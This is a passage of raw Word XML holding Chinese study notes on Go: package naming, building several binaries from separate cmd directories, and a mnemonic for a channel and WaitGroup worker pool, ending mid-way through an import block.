    <w:p w14:paraId="51B96487" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录名字可以和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的声明名字不一样，但是通常是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50526A15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04BC75B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>两个文件可以分别都有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>其他全局变量、函数名字是不能统一的，否则就命名冲突了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可以直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中重构变量名（可以放心直接使用，重构只在自己的当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>前文件发生，而不会影响到其他的文件）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC5E92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C4DB43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go build </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以分别编译，编译后的程序可以分别的、单独运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B5419" w14:textId="0C655E19" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D679B1" w14:textId="3FBBEF0B" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同目录下分别不同的二进制编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEAE6A" w14:textId="029C2AEA" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D293679" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> golang </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>项目可以有多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>吗</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0BD21" w14:textId="47D1F823" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go build </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是不是只能编译</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F89F4" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA"/>
    <w:p w14:paraId="646EBED8" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>项目中，虽然你可以有多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>文件，但每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>文件必须位于不同的包（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>）或目录中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>每个目录下只能有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>，且这些文件应该</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>归属于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> package main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve">package main </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>用于标识这是一个可执行程序，而不是一个库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C4C19" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> go build</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12201694" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>单个目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> go build</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>：如果你在一个目录中运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> go build</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>，它会查找该目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>文件并将其编译为可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740EE7C8" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>多个目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>：如果你在一个包含多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>文件的项目（位于不同的包或子目录中）中运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> go build</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>，你需要明确指定哪个目录或文件要被编译。例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build ./cmd/server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>会编译</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/server </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> main.go</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADED073" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve">go build </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>不是只能编译某个特定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>，而是可以编译多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> main.go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>文件所在的不同目录或包，具体取决于你如何组织项目结构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0B724" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t>/project-root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3EA64A" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t xml:space="preserve">    /cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E1FEE" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t xml:space="preserve">        /app1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BA608" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D6011" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t xml:space="preserve">        /app2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F769B" w14:textId="5E9B39E0" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D82BD1" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA"/>
    <w:p w14:paraId="48DC77BA" w14:textId="439EEA18" w:rsidR="00CF6CEA" w:rsidRPr="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build ./cmd/app1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build ./cmd/app2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6CEA">
        <w:t>分别构建不同的可执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03497767" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="00F23BE4" w:rsidRDefault="00CF6CEA" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8B4EEF" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的多线并发理解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E600BAD" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACD86B" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00FB3F27" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:r w:rsidRPr="00F23BE4">
        <w:t>https://www.cnblogs.com/QiaoPengjun/p/17383853.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7625B" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6400F6" w14:textId="2B13150D" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口诀：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1B066" w14:textId="7C1D080B" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. make chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> var wg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441AE996" w14:textId="77777777" w:rsidR="00423C7A" w:rsidRPr="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:t>ports := make(chan int, 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A6803" w14:textId="5200F93B" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:t>var wg sync.WaitGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EFA30" w14:textId="583BC04F" w:rsidR="00423C7A" w:rsidRPr="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>俩</w:t>
      </w:r>
      <w:r w:rsidR="009D474C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一建</w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>worker</w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，二</w:t>
      </w:r>
      <w:r w:rsidR="009D474C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扔任务：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cap go worker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:t>wg.Add(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3A2BC" w14:textId="5B40C141" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
        <w:t>ports &lt;- i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D8380" w14:textId="77777777" w:rsidR="00AC24D9" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>worker</w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Done</w:t>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D941A27" w14:textId="66EC1925" w:rsidR="00423C7A" w:rsidRPr="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:t>for p := range ports {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC0C09" w14:textId="77777777" w:rsidR="00423C7A" w:rsidRPr="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
        <w:t>fmt.Println("p", p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A265BC9" w14:textId="77777777" w:rsidR="00423C7A" w:rsidRPr="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
        <w:t>wg.Done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7C3BE" w14:textId="4C9BEF6E" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00423C7A">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2A399" w14:textId="51B90A39" w:rsidR="00AC24D9" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00AC24D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>俩终结，等与关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FEB55" w14:textId="2A5890AA" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>wg.Wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65C04E" w14:textId="796419FB" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00423C7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>close(ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBB717" w14:textId="77777777" w:rsidR="00423C7A" w:rsidRDefault="00423C7A" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3784FC99" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB54A0" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104A25D7" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A66ED" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B3FF4" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>"sync"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328153C6" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
